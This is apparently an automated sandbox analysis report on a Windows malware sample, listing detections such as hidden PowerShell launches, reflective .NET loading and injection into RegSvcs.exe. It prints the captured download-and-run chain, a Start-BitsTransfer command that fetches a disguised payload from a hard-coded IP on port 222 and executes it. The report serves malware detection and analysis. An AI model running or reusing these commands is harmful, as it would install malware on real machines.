              Source: Binary string: NewPE2.pdb source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NewPE2.pdbxf source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IFileSystem3.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", "true");ITextStream.Write("<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr");ITextStream.Close();IHost.CreateObject("WScript.Shell");IFileSystem3.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", "true");ITextStream.Write("<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr");ITextStream.Close();IWshShell3.Run("powershell -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEY", "0", "true");IHost.CreateObject("WScript.Shell");IFileSystem3.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", "true");ITextStream.Write("<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr");ITextStream.Close();IWshShell3.Run("powershell -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEY", "0", "true");IFileSystem3.DeleteFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml")
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | .Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | .Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | .Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | .Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, RamIajDijoDSEGPN.cs | .Net Code: gZXYCCeUKhWbCK System.AppDomain.Load(byte[])
              Source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, AssemblyLoader.cs | .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, AssemblyLoader.cs | .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, RamIajDijoDSEGPN.cs | .Net Code: gZXYCCeUKhWbCK System.AppDomain.Load(byte[])
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, RamIajDijoDSEGPN.cs | .Net Code: gZXYCCeUKhWbCK System.AppDomain.Load(byte[])
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: Yara match | File source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 22.2.RegSvcs.exe.7230000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 22.2.RegSvcs.exe.3f95168.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348B991E push esp; retf 3_2_00007FFD348B991F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348BBB9E pushfd ; ret 3_2_00007FFD348BBBC1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD3497598A push eax; retf 3_2_00007FFD3497598B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD349792C0 pushfd ; ret 3_2_00007FFD349792C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD3489739D push E85ADE1Eh; ret 12_2_00007FFD348973F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD34894849 push eax; retf 5F53h 20_2_00007FFD3489485D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD34892AF3 pushad ; retf 20_2_00007FFD34892AF9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD348923FB pushad ; iretd 20_2_00007FFD34892421
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072B25B4 push FFFFFF8Bh; iretd 22_2_072B25B6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072B24AF push FFFFFF8Bh; iretd 22_2_072B24B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072B23AA push FFFFFF8Bh; iretd 22_2_072B23AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072B2210 push FFFFFF8Bh; retf 22_2_072B2212
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072B22C8 push FFFFFF8Bh; retf 22_2_072B22CA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072B1CB2 push FFFFFF8Bh; retf 22_2_072B1CB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072B1BC4 push FFFFFF8Bh; iretd 22_2_072B1BDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_07350718 push esp; ret 22_2_07350831
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_07353AD7 push ebx; retf 22_2_07353ADA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_07372CA2 push eax; ret 22_2_07372CA3
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs | High entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, Native.cs | High entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.cs | High entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, CbzIJlGmnEw.cs | High entropy of concatenated method names: 'ukLVYKemDXMRrM', 'etJPQFXdCyl', 'VoxCNFCkGvCF', 'zANTvwYVCPbVN', 'fxzWByngzG', 'lkkCdJQdjfnB', 'cvAuXOxJsDBh', 'HVGJEyOonnBEH', 'aoULTRkGAXpTdAZm', 'bqAYdndFwROTXQNY'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | High entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, Native.cs | High entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, PE.cs | High entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, CbzIJlGmnEw.cs | High entropy of concatenated method names: 'ukLVYKemDXMRrM', 'etJPQFXdCyl', 'VoxCNFCkGvCF', 'zANTvwYVCPbVN', 'fxzWByngzG', 'lkkCdJQdjfnB', 'cvAuXOxJsDBh', 'HVGJEyOonnBEH', 'aoULTRkGAXpTdAZm', 'bqAYdndFwROTXQNY'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | High entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, Native.cs | High entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, PE.cs | High entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, CbzIJlGmnEw.cs | High entropy of concatenated method names: 'ukLVYKemDXMRrM', 'etJPQFXdCyl', 'VoxCNFCkGvCF', 'zANTvwYVCPbVN', 'fxzWByngzG', 'lkkCdJQdjfnB', 'cvAuXOxJsDBh', 'HVGJEyOonnBEH', 'aoULTRkGAXpTdAZm', 'bqAYdndFwROTXQNY'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.cs | High entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, Native.cs | High entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, PE.cs | High entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'

              Persistence and Installation Behavior

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: \KnownDlls\BitsProxy.dll

              Boot Survival

              Source: Yara match | File source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR

              Hooking and other Techniques for Hiding and Protection

              Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 222
              Source: unknown | Network traffic detected: HTTP traffic on port 222 -> 49699
              Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 222
              Source: unknown | Network traffic detected: HTTP traffic on port 222 -> 49703
              Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 222
              Source: unknown | Network traffic detected: HTTP traffic on port 222 -> 49703
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
